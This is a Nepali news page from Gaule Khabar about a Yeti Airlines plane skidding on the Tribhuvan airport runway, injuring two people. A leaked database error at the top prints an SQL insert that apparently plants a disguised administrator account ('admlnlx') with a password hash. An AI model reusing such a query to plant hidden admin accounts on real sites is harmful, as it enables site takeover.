WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVpi.VKHw79JCLLTbOisJ6vSTMpsOb1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:08:34', '', 'admlnlx', 'admlnlx')

त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको धावनमार्गमा यती एयरलाइन्सको विमान चिप्लियो – Gaule Khabar

त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको धावनमार्गमा यती एयरलाइन्सको विमान चिप्लियो

त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको धावनमार्गमा यती एयरलाइन्सको विमान चिप्लियो

गाउले न्युज-असार २७ शुक्रबार काठमाडौं, त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको धावनमार्गमा यती एयरलाइन्सको विमान चिप्लिएको छ ।

नेपालगञ्जबाट यात्रु बोकेर आएको एटीआर–७२ को यती एयरलाइन्सको जहाज अवतरणका क्रममा जहाज शुक्रबार बिहान धावनमार्गमा चिप्लिएको हो ।

दुर्घटना हुँदा २ जना यात्रु घाइते भएका छन् । जहाजमा चालक दलका ४ र यात्रु ६६ गरी जम्मा ७० जना थिए । त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलका अनुसार सबै यात्रुलाई सकुशल बाहिर निकालिएको छ । धावन मार्गमै जहाज चिप्लिएपछि अहिले विमानको उडान अवतरण अवरुद्ध भएको छ ।

निरन्तर बर्षा को कारण अझै अवरुद्ध विमानस्थल सञ्चालनमा आउन केही समय लाग्ने बताइएको छ ।

 

https://gaulenews.com/?p=47122

https://www.youtube.com/channel/UCBI86hKRVKrCmZXAS-fTcPA

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका